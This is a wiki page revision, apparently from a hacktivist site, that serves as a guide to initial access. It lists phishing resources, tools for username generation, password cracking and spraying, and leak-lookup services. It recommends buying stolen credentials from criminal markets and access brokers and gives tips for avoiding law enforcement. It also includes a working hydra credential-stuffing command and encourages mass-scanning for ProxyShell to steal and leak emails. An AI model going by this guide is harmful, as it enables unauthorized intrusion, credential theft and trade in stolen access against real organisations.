Initial Access Tactics, techniques and procedures: Difference between revisions
Line 76: | Line 76: | ||
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying | * https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying | ||
* https://github.com/blacklanternsecurity/TREVORspray | * https://github.com/blacklanternsecurity/TREVORspray | ||
* https://github.com/knavesec/CredMaster | |||
* https://github.com/xFreed0m/RDPassSpray | |||
* https://github.com/dafthack/MailSniper | |||
=== Hash cracking === | === Hash cracking === |
Revision as of 22:27, 22 April 2023
Phishing
Phishing is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious email attachment or click on a malicious link. As hacktivists we want to find away to gain entry inside the targets network as quickly and easily as possible to leak documents, expose lies and corruption and free the truth!
Tools
- https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html
- https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165
- https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55
- https://www.xanthus.io/mastering-the-simulated-phishing-attack
- https://github.com/Arno0x/EmbedInHTML
- https://github.com/L4bF0x/PhishingPretexts
- http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html
- https://book.hacktricks.xyz/phishing-methodology
- https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective
- https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/
- https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/
- https://getgophish.com/ Be sure to remove the identifying headers gophish adds
- https://github.com/curtbraz/PhishAPI
- https://github.com/edoverflow/can-i-take-over-xyz
- https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
Password Attacks
Groups like Lapsus$ show's the world that you don't need to be a great technical hacker to pwn massive corporations and if common password and multi-factor authentication (MFA) attacks work on the likes of Uber, Rockstar games, Okta and so on then they will work on our hacktivist targets!
If your target uses multi-factor authentication you can try either social engineering or MFA fatigue.
Username creation based on recon/osint
- https://github.com/Mebus/cupp
- https://github.com/digininja/RSMangler
- https://github.com/sc0tfree/mentalist
- https://github.com/urbanadventurer/username-anarchy
- https://github.com/vysecurity/LinkedInt
- https://github.com/initstring/linkedin2username
- https://bitbucket.org/grimhacker/office365userenum/src/master
- https://github.com/shroudri/username_generator
- https://github.com/digininja/CeWL
Passwords
- https://github.com/danielmiessler/SecLists/tree/master/Passwords
- https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
- https://github.com/ihebski/DefaultCreds-cheat-sheet
Password cracking tools
- https://www.kali.org/tools/ncrack
- https://www.kali.org/tools/wfuzz
- https://www.kali.org/tools/medusa
- https://www.kali.org/tools/patator
- https://www.kali.org/tools/hydra
A basic example using a wordlist in the format of email:pass/user:pass. hydra -C creds.txt target.com -s 443 http-post-form "/login:username=^USER^&password=^PASS^:These credentials do not match our records." -S
Searching leaks
- https://github.com/khast3x/h8mail [Free but includes paid services]
Services
Please note: DO NOT use intelx[.]io as they have been seen doxing hackers in the past and block the use of Tor. AVOID!
- https://haveibeenpwned.com
- https://leak-lookup.com [Paid. Accepts crypto (XMR & BTC)]
- https://dehashed.com [Paid. Accepts crypto (BTC)]
Once your leaks have been downloaded you can parse your results in the format, email:pass.
Buying access
WARNING! The genesis market has been seized by the authorities. They do operate a v3 Tor onion address however it's unclear whether or not the feds have back-end access to the market so for safety we won't list it here. Genesis admin response.
You can use the genesis market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an admin account. Any account that allows internal access is always a great start. Invites can be found on forums and markets.
You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).
- https://xss.is
- https://exploit.in [Free & Paid]
Password spraying
- https://github.com/dafthack/MSOLSpray
- https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying
- https://github.com/blacklanternsecurity/TREVORspray
- https://github.com/knavesec/CredMaster
- https://github.com/xFreed0m/RDPassSpray
- https://github.com/dafthack/MailSniper
Hash cracking
- https://hashes.com/en/decrypt/hash [Free & Paid]
- https://crackstation.net
- https://github.com/hashcat/hashcat
- https://github.com/openwall/john
Targeted spray and pray
As seen by Guacamaya, hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or our target companies IP ranges for critical vulnerabilities and grep out targeted domains. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target emails out of their Microsoft exchange email servers and leaked them. You can also do the same! See scanning and recon for tools such as nuclei and the nmap scripting engine (NSE) to then scan the IP addresses you discover. You can resolve the IP addresses to their respective domains (reverse DNS lookup) using nmap -Pn -sS -R -iL targets.txt -oA results
, however this is also done by default when performing a vulnerability scan using NSE.